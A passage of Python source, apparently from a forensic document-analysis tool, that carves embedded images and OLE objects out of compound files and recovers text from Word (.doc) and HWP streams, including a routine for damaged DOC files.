embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF029:
extension = ".tiff"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
if extension == "":
break
embedded_data = drawing_data[drawing_offset: drawing_offset + embedded_size]
drawing_offset += embedded_size
os.makedirs(self.compound.ole_path, exist_ok=True)
# self.compound.ole_path.append(
# self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + extension)
embedded_fp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + extension, 'wb')
img_num += 1
embedded_fp.write(embedded_data)
embedded_fp.close()
except Exception:
pass # No Image
### OLE
ole = olefile.OleFileIO(self.compound.filePath)
ole_fp = open(self.compound.filePath, 'rb')
img_num = 0
for i in range(0, len(ole.direntries)):
try:
if ole.direntries[i].name == '\x01Ole10Native': # Multimedia
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
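# Ole10Native layout walked below: 4-byte total size + 2-byte flags,
# NUL-terminated label and original path, 8 bytes of UType/reserved,
# a NUL-terminated data path, then a 4-byte length and the raw payload.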
ole_data_offset = 6 # Header
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # Label
data_name = ole_data[6 : ole_data_offset].decode('ASCII')
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # OrgPath
ole_data_offset += 8 # UType
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # DataPath
ole_data_offset += 1
data_size = struct.unpack('<I', ole_data[ole_data_offset : ole_data_offset + 4])[0]
ole_data_offset += 4
data = ole_data[ole_data_offset : ole_data_offset + data_size]
os.makedirs(self.compound.ole_path, exist_ok=True)
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + data_name)
temp = open(self.compound.ole_path + os.path.sep + data_name, 'wb')
temp.write(data)
temp.close()
elif ole.direntries[i].name == 'Package': # embedded OOXML handling
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if ole_data.find(b'xl/workbook.xml') != -1: # XLSX
extension = ".xlsx"
elif ole_data.find(b'word/document.xml') != -1: # DOCX
extension = ".docx"
elif ole_data.find(b'ppt/presentation.xml') != -1: # PPTX
extension = ".pptx"
else:
extension = ".zip"
os.makedirs(self.compound.ole_path, exist_ok=True)
# self.compound.ole_path.append(
# self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
# img_num) + extension)
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + extension, 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name == 'CONTENTS': # PDF
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
os.makedirs(self.compound.ole_path, exist_ok=True)
#self.compound.ole_path.append(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".pdf")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".pdf", 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name[0:1] == '_' and len(ole.direntries[i].name) == 11:
self.compound.has_ole = True
word_document = None
table = None
powerpoint_document = None
current_user = None
workbook = None
section_data = ""
for j in range(0, len(ole.direntries[i].kids)):
if ole.direntries[i].kids[j].name == "WordDocument":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
word_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "1Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "0Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "PowerPoint Document":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
powerpoint_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "Current User":
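# Rebuild the root storage's sector chain by walking the FAT, then slice
# "Current User" out of it; isectStart acts as a 64-byte mini-sector
# index for a stream this small.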
idx = ole.root.isectStart
chain = [idx]
while True:
idx = ole.fat[idx]
if idx == 0xFFFFFFFE: # ENDOFCHAIN
break
chain.append(idx)
out = bytearray(b'')
for idx in chain:
pos = (idx + 1) * 512
ole_fp.seek(pos)
d = ole_fp.read(512)
out += d
current_user = out[64 * (ole.direntries[i].kids[j].isectStart):64 * (ole.direntries[i].kids[j].isectStart) + ole.direntries[i].kids[j].size]
elif ole.direntries[i].kids[j].name == "Workbook":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
workbook = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "BodyText":
section_data = ""
for k in range(0, len(ole.direntries[i].kids[j].kids)):
ole_fp.seek((ole.direntries[i].kids[j].kids[k].isectStart + 1) * 0x200)
temp_section_data = ole_fp.read(ole.direntries[i].kids[j].kids[k].size)
if temp_section_data[0:2] == b'\x42\x00':
is_compressed = False
else:
is_compressed = True
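# HWP BodyText sections are raw-deflate streams unless they already begin
# with a plain record header (leading bytes 0x42 0x00).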
msg = self.inflateBodytext(temp_section_data, is_compressed)
if msg is not False:
section_data += msg
# DOC
result = None
if word_document != None and table != None:
result = self.__parse_doc_normal_for_ole__(word_document, table)
if result != None:
os.makedirs(self.compound.ole_path, exist_ok=True)
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# XLS
from modules.DEFA.MS_Office.carpe_xls import XLS
from modules.DEFA.MS_Office.carpe_compound import Compound
result = None
if workbook != None:
temp_xls = XLS(Compound(self.compound.filePath))
result = temp_xls.__parse_xls_normal_for_ole__(workbook)
if result != None:
os.makedirs(self.compound.ole_path, exist_ok=True)
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# PPT
from modules.DEFA.MS_Office.carpe_ppt import PPT
from modules.DEFA.MS_Office.carpe_compound import Compound
result = None
if powerpoint_document != None and current_user != None:
temp_ppt = PPT(Compound(self.compound.filePath))
result = temp_ppt.__parse_ppt_normal_for_ole__(powerpoint_document, current_user)
if result != None:
os.makedirs(self.compound.ole_path, exist_ok=True)
#self.compound.ole_path.append(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# HWP
if section_data != "":
os.makedirs(self.compound.ole_path, exist_ok=True)
#self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(img_num) + ".txt")
temp = open(self.compound.ole_path + os.path.sep + self.compound.fileName + "_" + str(img_num) + ".txt", 'w', encoding='utf-16')
temp.write(section_data)
temp.close()
img_num += 1
except Exception:
continue
ole_fp.close()
def __parse_doc_normal_for_ole__(self, word_document, byteTable):
if len(byteTable) == 0:
return self.compound.CONST_ERROR
# Extract doc Text
ccpText = b''
fcClx = b''
lcbClx = b''
aCP = b''
aPcd = b''
fcCompressed = b''
Clx = b''
ccpTextSize = 0
fcClxSize = 0
lcbClxSize = 0
ClxSize = 0
string = b''
CONST_FCFLAG = 1073741824 # 0x40000000
CONST_FCINDEXFLAG = 1073741823 # 0x3FFFFFFF
i = 0
j = 0
k = 0
# Check encryption: bit 0 of FIB byte 0x0B is the fEncrypted flag
uc_temp = word_document[11]
uc_temp = uc_temp & 1
if uc_temp == 1:
return self.compound.CONST_ERROR
# Get cppText in FibRgLw
ccpText = word_document[0x4C:0x50]
ccpTextSize = struct.unpack('<I', ccpText)[0]
if (ccpTextSize == 0):
return self.compound.CONST_ERROR
# Get fcClx in FibRgFcLcbBlob
fcClx = word_document[0x1A2:0x1A6]
fcClxSize = struct.unpack('<I', fcClx)[0]
if (fcClxSize == 0):
return self.compound.CONST_ERROR
# Get lcbClx in FibRgFcLcbBlob
lcbClx = word_document[0x1A6:0x1AA]
lcbClxSize = struct.unpack('<I', lcbClx)[0]
if (lcbClxSize == 0):
return self.compound.CONST_ERROR
# Get Clx
Clx = byteTable[fcClxSize: fcClxSize + lcbClxSize]
if Clx[0] == 0x01: # clxt 0x01: a Prc (property data) precedes the piece table
cbGrpprl = struct.unpack("<H", Clx[1:3])[0]
# Skip the whole Prc (1-byte clxt + 2-byte cbGrpprl + payload); only a
# single leading Prc is handled here. The remaining Clx runs to its own
# end; the old "+ lcbClxSize - cbGrpprl + 3" bound over-read by 6 bytes.
Clx = byteTable[fcClxSize + cbGrpprl + 3: fcClxSize + lcbClxSize]
if Clx[0] != 0x02: # clxt 0x02 introduces the PlcPcd (piece table)
return self.compound.CONST_ERROR
ClxSize = struct.unpack('<I', Clx[1:5])[0]
ClxIndex = 5
PcdCount = 0
aCPSize = []
fcFlag = 0
fcIndex = 0
fcSize = 0
encodingFlag = False
PcdCount = int(((ClxSize / 4) / 3)) + 1
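# A PlcPcd describing n pieces holds n + 1 CPs (4 bytes each) followed by
# n 8-byte Pcds, so its size is 12n + 4: the formula above yields n + 1
# CP entries, and the decrement after the CP loop leaves n Pcds.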
for i in range(0, PcdCount):
aCp = Clx[ClxIndex:ClxIndex + 4]
aCPSize.append(struct.unpack('<I', aCp[0:4])[0])
ClxIndex += 4
PcdCount -= 1
### Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
# The patterns below are UTF-16LE field keywords and Word field control marks.
uCaption = b'\x53\x00\x45\x00\x51\x00' # "SEQ"
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00' # "ARACIC " + 0x14 (apparently a mistyped "ARABIC")
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00' # "HYPERLINK"
uToc = b'\x54\x00\x4F\x00' # "TO" (prefix of "TOC")
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00' # "PAGEREF"
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00' # "INDEX"
uEnd = b'\x20\x00\x01\x00\x14\x00' # space + 0x01 + field separator 0x14
uEnd2 = b'\x20\x00\x14\x00' # space + field separator 0x14
uEnd3 = b'\x20\x00\x15\x00' # space + field end 0x15
uEnd4 = b'\x14\x00' # field separator
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00' # field end
uHeader = b'\x13\x00' # field begin
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00' # "EMBED"
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00' # "SHAPE"
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00' # "PAGE"
uDoc = b'\x44\x00\x4F\x00\x43\x00' # "DOC"
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00' # "STYLEREF"
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00' # "TITLE"
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00' # "IF DATE"
### Filtering targets: 0x0001 ~ 0x0017 (0x000A Line Feed skipped)
uTab = b'\x09\x00' # Horizontal Tab
uSpecial = b'\xF0' # high byte of a UTF-16 code unit in the U+F0xx private-use range
bFullScanA = False
bFullScanU = False # if the size info is invalid, then the entire range will be scanned.
tempPlus = 0
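# Walk the Pcd (piece descriptor) array: each Pcd is 8 bytes and bytes
# 2..6 hold the fc field. Bit 0x40000000 (fCompressed) marks a piece of
# 8-bit ANSI text stored at offset fc/2; otherwise the piece is 16-bit
# Unicode stored at offset fc.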
for i in range(0, PcdCount):
aPcd = Clx[ClxIndex:ClxIndex + 8]
fcCompressed = aPcd[2:6]
fcFlag = struct.unpack('<I', fcCompressed[0:4])[0]
if CONST_FCFLAG == (fcFlag & CONST_FCFLAG):
encodingFlag = True # 8-bit ANSI
else:
encodingFlag = False # 16-bit Unicode
fcIndex = fcFlag & CONST_FCINDEXFLAG
k = 0
if encodingFlag == True: # 8-bit ANSI
fcIndex = int(fcIndex / 2)
fcSize = aCPSize[i + 1] - aCPSize[i]
if len(word_document) < fcIndex + fcSize + 1:
if bFullScanA == False and len(word_document) > fcIndex:
fcSize = len(word_document) - fcIndex - 1
bFullScanA = True
else:
ClxIndex += 8
continue
ASCIIText = word_document[fcIndex:fcIndex + fcSize]
# Widen the 8-bit ANSI run to UTF-16LE (each byte followed by \x00);
# latin-1 maps byte values 0-255 straight to code points.
UNICODEText = ASCIIText.decode('latin-1').encode('utf-16-le')
while k < len(UNICODEText):
pair = UNICODEText[k:k + 2]
# uSpecial must be matched as a one-byte slice: indexing a bytes object
# yields an int, which never compares equal to b'\xF0'.
if pair in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uTrash) or UNICODEText[k + 1:k + 2] == uSpecial:
k += 2 # drop control characters, object markers and NUL padding
continue
if pair in (uNewline, uNewline2, uNewline3, uNewline4):
string += pair # keep one newline, then collapse the following run
j = k + 2
while j < len(UNICODEText):
nxt = UNICODEText[j:j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uNewline, uNewline2, uNewline3, uNewline4, uTab) or UNICODEText[j + 1:j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= len(UNICODEText):
break
elif pair in (uBlank, uBlank2, uTab):
string += pair # keep one blank/tab, then collapse the following run
j = k + 2
while j < len(UNICODEText):
nxt = UNICODEText[j:j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uTab) or UNICODEText[j + 1:j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= len(UNICODEText):
break
string += UNICODEText[k:k + 2]
k += 2
elif encodingFlag == False: ### 16-bit Unicode
fcSize = 2 * (aCPSize[i + 1] - aCPSize[i])
if len(word_document) < fcIndex + fcSize + 1: # invalid structure - size info too large => scan from fcIndex to the end
if (bFullScanU == False and len(word_document) > fcIndex):
fcSize = len(word_document) - fcIndex - 1
bFullScanU = True
else:
ClxIndex = ClxIndex + 8
continue
while k < fcSize:
pair = word_document[fcIndex + k: fcIndex + k + 2]
# uSpecial must be matched as a one-byte slice: indexing a bytes object
# yields an int, which never compares equal to b'\xF0'.
if pair in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uTrash) or word_document[fcIndex + k + 1:fcIndex + k + 2] == uSpecial:
k += 2
continue
if pair in (uNewline, uNewline2, uNewline3, uNewline4):
if word_document[fcIndex + k] == 0x0d:
string += b'\x0a' # normalize CR to LF
string += bytes([word_document[fcIndex + k + 1]])
else:
string += pair
j = k + 2
while j < fcSize:
nxt = word_document[fcIndex + j: fcIndex + j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uNewline, uNewline2, uNewline3, uNewline4, uTab) or word_document[fcIndex + j + 1:fcIndex + j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= fcSize:
break
elif pair in (uBlank, uBlank2, uTab):
string += pair
j = k + 2
while j < fcSize:
nxt = word_document[fcIndex + j: fcIndex + j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uTab) or word_document[fcIndex + j + 1:fcIndex + j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= fcSize:
break
string += word_document[fcIndex + k: fcIndex + k + 2]
k += 2
ClxIndex += 8
dictionary = self.__doc_extra_filter__(string, len(string))
filteredText = dictionary['string']
filteredLen = dictionary['length']
#self.compound.content = filteredText.decode("utf-16")
###### DOC: ensure a trailing newline terminator
if len(filteredText) != 0:
nPos = filteredLen
usTmp1 = 0
usTmp2 = 0
if nPos >= 4:
usTmp1 = struct.unpack('<H', filteredText[nPos - 4 : nPos - 2])[0]
usTmp2 = struct.unpack('<H', filteredText[nPos - 2 : nPos])[0]
# usTmp1/usTmp2 are ints, so compare with the numeric code unit 0x000A;
# the old "== uNewline" compared an int to bytes and was always False.
if usTmp1 == 0x000A:
if usTmp2 != 0x000A:
filteredText += b'\x0A\x00\x00\x00'
else:
if usTmp2 == 0x000A:
filteredText += b'\x0A\x00\x00\x00'
else:
filteredText += b'\x0A\x00\x0A\x00\x00\x00'
result = ""
#######
for i in range(0, len(filteredText), 2):
try:
result += filteredText[i:i+2].decode('utf-16')
except UnicodeDecodeError:
continue
return result
def inflateBodytext(self, section, isCompressed):
msg = bytearray()
if isCompressed:
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
try:
stream = decompress.decompress(section)
stream += decompress.flush()
except Exception:
return False
else:
stream = section
streamLen = len(stream)
nPos = 0
RecordHeader = stream[0:4]
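# An HWP record header packs tag (10 bits), level (10 bits) and size
# (12 bits) into one little-endian DWORD; nRecordLength below extracts
# the top 12 bits, and tag 0x43 is HWPTAG_PARA_TEXT.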
while (RecordHeader[0] >= 0x40) and (RecordHeader[0] <= 0x60):
try:
nRecordLength = (RecordHeader[3] << 4) | (RecordHeader[2] >> 4)
nRecordPos = 4
if RecordHeader[0] == 0x43: # HWPTAG_PARA_TEXT
temp = stream[nPos + 4:nPos + 4 + 2]
uWord = struct.unpack('<H', temp)
# Skip leading extended-control words (each carries a 16-byte payload).
# The original never re-read uWord here, so a single control character
# could spin this loop forever; re-read after each skip.
while 0x0001 <= uWord[0] <= 0x0017 and uWord[0] != 0x000A and uWord[0] != 0x000D:
nRecordPos += 16
if nPos + nRecordPos + 2 > streamLen:
break
uWord = struct.unpack('<H', stream[nPos + nRecordPos:nPos + nRecordPos + 2])
if nRecordLength < nRecordPos + 2:
break
temp = stream[nPos + nRecordPos:nPos + nRecordPos + 2]
uWord = struct.unpack('<H', temp)
if (nRecordLength - nRecordPos + 4) / 2 >= 1:
index = (nRecordLength - nRecordPos + 4) / 2
i = 0
while i < int(index):
temp = stream[nPos + nRecordPos + i * 2:nPos + nRecordPos + i * 2 + 2]
uWord = struct.unpack('<H', temp)
if 0x0001 <= uWord[0] <= 0x0017:
if uWord[0] != 0x000A and uWord[0] != 0x000D:
if uWord[0] == 0x0009:
msg.append(0x20)
msg.append(0x00)
i += 7
continue
if uWord[0] == 0x000D:
msg.append(0x0A)
msg.append(0x00)
msg.append(stream[nPos + nRecordPos + i * 2])
msg.append(stream[nPos + nRecordPos + i * 2 + 1])
i += 1
nPos += nRecordLength + 4
if streamLen <= nPos:
break
else:
RecordHeader = stream[nPos:nPos + 4]
except Exception:
break
# Filtering
if len(msg) > 0:
try:
msg = msg.decode("utf-16", 'ignore')
except Exception:
msg = ""
return msg
else:
return False
def __parse_doc_damaged__(self):
file = bytearray(self.compound.fp.read())
m_word = b''
m_table = b''
m_data = b''
wordFlag = False
tableFlag = False
dataFlag = False # must start False; starting True made a missing Data stream abort the parse below
word_document = b''
drawing_data = b''
data = b''
one_table = b''
zero_table = b''
string = b''
CONST_FCFLAG = 1073741824 # 0x40000000
CONST_FCINDEXFLAG = 1073741823 # 0x3FFFFFFF
CONST_TABLE1_WORD = b'\x57\x00\x6F\x00\x72\x00\x64\x00\x44\x00\x6F\x00' # "WordDo" in UTF-16LE
CONST_TABLE2_1TABLE = b'\x31\x00\x54\x00\x61\x00\x62\x00\x6C\x00\x65\x00' # "1Table" in UTF-16LE
CONST_DATA_SIGNATURE = b'\xEC\xA5' # FIB wIdent 0xA5EC (little-endian) marks a WordDocument stream
CONST_DATA = b'\x44\x00\x61\x00\x74\x00\x61\x00' # "Data" in UTF-16LE
nCurPos = 0
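# With the compound file presumed damaged, scan the raw bytes in steps of
# 0x80 (the size of a directory entry) for the UTF-16LE names of the
# WordDocument, 1Table and Data directory entries.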
while(nCurPos < len(file)):
if(file[nCurPos : nCurPos + 12] == CONST_TABLE1_WORD):
m_word = file[nCurPos : nCurPos + 0x80]
wordFlag = True
if (file[nCurPos: nCurPos + 12] == CONST_TABLE2_1TABLE):
m_table = file[nCurPos: nCurPos + 0x80]
tableFlag = True
if (file[nCurPos: nCurPos + 8] == CONST_DATA):
m_data = file[nCurPos: nCurPos + 0x80]
dataFlag = True
if (tableFlag == True and wordFlag == True and dataFlag == True):
break
nCurPos += 0x80
if tableFlag == False or wordFlag == False:
return False # both the WordDocument and Table entries are required
# word
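# Offsets 0x74/0x78 of a directory entry hold the stream's starting
# sector and size, readable even without an intact FAT.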
if (file[0x200:0x202] == CONST_DATA_SIGNATURE):
if wordFlag == True:
wordStartIndex = struct.unpack('<I', m_word[0x74:0x78])[0]
wordSize = struct.unpack('<I', m_word[0x78:0x7C])[0]
if wordSize < len(file) - 0x202:
word_document = file[(wordStartIndex + 1) * 0x200 : (wordStartIndex + 1) * 0x200 + wordSize]
else:
word_document = file[0x200:]
#table
if tableFlag == True:
tableStartIndex = struct.unpack('<I', m_table[0x74:0x78])[0]
tableSize = struct.unpack('<I', m_table[0x78:0x7C])[0]
byteTable = file[(tableStartIndex + 1) * 0x200 : (tableStartIndex + 1) * 0x200 + tableSize]
#data
if dataFlag == True:
try: # temporary workaround for malformed Data entries
dataStartIndex = struct.unpack('<I', m_data[0x74:0x78])[0]
except struct.error:
return False
dataSize = struct.unpack('<I', m_data[0x78:0x7C])[0]
drawing_data = file[(dataStartIndex + 1) * 0x200 : (dataStartIndex + 1) * 0x200 + dataSize]
if len(word_document) <= 0x200: ### No Data
return False
# Get cppText in FibRgLw
ccpText = word_document[0x4C:0x50]
ccpTextSize = struct.unpack('<I', ccpText)[0]
if (ccpTextSize == 0):
return self.compound.CONST_ERROR
# Get fcClx in FibRgFcLcbBlob
fcClx = word_document[0x1A2:0x1A6]
fcClxSize = struct.unpack('<I', fcClx)[0]
if (fcClxSize == 0):
return self.compound.CONST_ERROR
# Get lcbClx in FibRgFcLcbBlob
lcbClx = word_document[0x1A6:0x1AA]
lcbClxSize = struct.unpack('<I', lcbClx)[0]
if (lcbClxSize == 0):
return self.compound.CONST_ERROR
# Get Clx
Clx = byteTable[fcClxSize: fcClxSize + lcbClxSize]
if Clx[0] == 0x01: # clxt 0x01: a Prc (property data) precedes the piece table
cbGrpprl = struct.unpack("<H", Clx[1:3])[0]
# Skip the whole Prc (1-byte clxt + 2-byte cbGrpprl + payload); only a
# single leading Prc is handled here. The remaining Clx runs to its own
# end; the old "+ lcbClxSize - cbGrpprl + 3" bound over-read by 6 bytes.
Clx = byteTable[fcClxSize + cbGrpprl + 3: fcClxSize + lcbClxSize]
if Clx[0] != 0x02: # clxt 0x02 introduces the PlcPcd (piece table)
return self.compound.CONST_ERROR
ClxSize = struct.unpack('<I', Clx[1:5])[0]
ClxIndex = 5
PcdCount = 0
aCPSize = []
fcFlag = 0
fcIndex = 0
fcSize = 0
encodingFlag = False
PcdCount = int(((ClxSize / 4) / 3)) + 1
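# A PlcPcd describing n pieces holds n + 1 CPs (4 bytes each) followed by
# n 8-byte Pcds, so its size is 12n + 4: the formula above yields n + 1
# CP entries, and the decrement after the CP loop leaves n Pcds.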
for i in range(0, PcdCount):
aCp = Clx[ClxIndex:ClxIndex + 4]
aCPSize.append(struct.unpack('<I', aCp[0:4])[0])
ClxIndex += 4
PcdCount -= 1
### Filtering
uBlank = b'\x20\x00' # ASCII Blank
uBlank2 = b'\xA0\x00' # Unicode Blank
uNewline = b'\x0A\x00' # Line Feed
uNewline2 = b'\x0D\x00'
uNewline3 = b'\x04\x00'
uNewline4 = b'\x03\x00'
uSection = b'\x01\x00'
uSection2 = b'\x02\x00'
uSection3 = b'\x05\x00'
uSection4 = b'\x07\x00'
uSection5 = b'\x08\x00'
uSection6 = b'\x15\x00'
uSection7 = b'\x0C\x00'
uSection8 = b'\x0B\x00'
uSection9 = b'\x14\x00'
uTrash = b'\x00\x00'
# The patterns below are UTF-16LE field keywords and Word field control marks.
uCaption = b'\x53\x00\x45\x00\x51\x00' # "SEQ"
uCaption2 = b'\x41\x00\x52\x00\x41\x00\x43\x00\x49\x00\x43\x00\x20\x00\x14\x00' # "ARACIC " + 0x14 (apparently a mistyped "ARABIC")
uHyperlink = b'\x48\x00\x59\x00\x50\x00\x45\x00\x52\x00\x4C\x00\x49\x00\x4E\x00\x4B\x00' # "HYPERLINK"
uToc = b'\x54\x00\x4F\x00' # "TO" (prefix of "TOC")
uPageref = b'\x50\x00\x41\x00\x47\x00\x45\x00\x52\x00\x45\x00\x46\x00' # "PAGEREF"
uIndex = b'\x49\x00\x4E\x00\x44\x00\x45\x00\x58\x00' # "INDEX"
uEnd = b'\x20\x00\x01\x00\x14\x00' # space + 0x01 + field separator 0x14
uEnd2 = b'\x20\x00\x14\x00' # space + field separator 0x14
uEnd3 = b'\x20\x00\x15\x00' # space + field end 0x15
uEnd4 = b'\x14\x00' # field separator
uEnd5 = b'\x01\x00\x14\x00'
uEnd6 = b'\x15\x00' # field end
uHeader = b'\x13\x00' # field begin
uChart = b'\x45\x00\x4D\x00\x42\x00\x45\x00\x44\x00' # "EMBED"
uShape = b'\x53\x00\x48\x00\x41\x00\x50\x00\x45\x00' # "SHAPE"
uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00' # "PAGE"
uDoc = b'\x44\x00\x4F\x00\x43\x00' # "DOC"
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00' # "STYLEREF"
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00' # "TITLE"
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00' # "IF DATE"
### Filtering targets: 0x0001 ~ 0x0017 (0x000A Line Feed skipped)
uTab = b'\x09\x00' # Horizontal Tab
uSpecial = b'\xF0' # high byte of a UTF-16 code unit in the U+F0xx private-use range
bFullScanA = False
bFullScanU = False # if the size info is invalid, then the entire range will be scanned.
tempPlus = 0
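# Walk the Pcd (piece descriptor) array: each Pcd is 8 bytes and bytes
# 2..6 hold the fc field. Bit 0x40000000 (fCompressed) marks a piece of
# 8-bit ANSI text stored at offset fc/2; otherwise the piece is 16-bit
# Unicode stored at offset fc.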
for i in range(0, PcdCount):
aPcd = Clx[ClxIndex:ClxIndex + 8]
fcCompressed = aPcd[2:6]
fcFlag = struct.unpack('<I', fcCompressed[0:4])[0]
if CONST_FCFLAG == (fcFlag & CONST_FCFLAG):
encodingFlag = True # 8-bit ANSI
else:
encodingFlag = False # 16-bit Unicode
fcIndex = fcFlag & CONST_FCINDEXFLAG
k = 0
if encodingFlag == True: # 8-bit ANSI
fcIndex = int(fcIndex / 2)
fcSize = aCPSize[i + 1] - aCPSize[i]
if len(word_document) < fcIndex + fcSize + 1:
if bFullScanA == False and len(word_document) > fcIndex:
fcSize = len(word_document) - fcIndex - 1
bFullScanA = True
else:
ClxIndex += 8
continue
ASCIIText = word_document[fcIndex:fcIndex + fcSize]
# Widen the 8-bit ANSI run to UTF-16LE (each byte followed by \x00);
# latin-1 maps byte values 0-255 straight to code points.
UNICODEText = ASCIIText.decode('latin-1').encode('utf-16-le')
while k < len(UNICODEText):
pair = UNICODEText[k:k + 2]
# uSpecial must be matched as a one-byte slice: indexing a bytes object
# yields an int, which never compares equal to b'\xF0'.
if pair in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uTrash) or UNICODEText[k + 1:k + 2] == uSpecial:
k += 2 # drop control characters, object markers and NUL padding
continue
if pair in (uNewline, uNewline2, uNewline3, uNewline4):
string += pair # keep one newline, then collapse the following run
j = k + 2
while j < len(UNICODEText):
nxt = UNICODEText[j:j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uNewline, uNewline2, uNewline3, uNewline4, uTab) or UNICODEText[j + 1:j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= len(UNICODEText):
break
elif pair in (uBlank, uBlank2, uTab):
string += pair # keep one blank/tab, then collapse the following run
j = k + 2
while j < len(UNICODEText):
nxt = UNICODEText[j:j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uTab) or UNICODEText[j + 1:j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= len(UNICODEText):
break
string += UNICODEText[k:k + 2]
k += 2
elif encodingFlag == False: ### 16-bit Unicode
fcSize = 2 * (aCPSize[i + 1] - aCPSize[i])
if len(word_document) < fcIndex + fcSize + 1: # invalid structure - size info too large => scan from fcIndex to the end
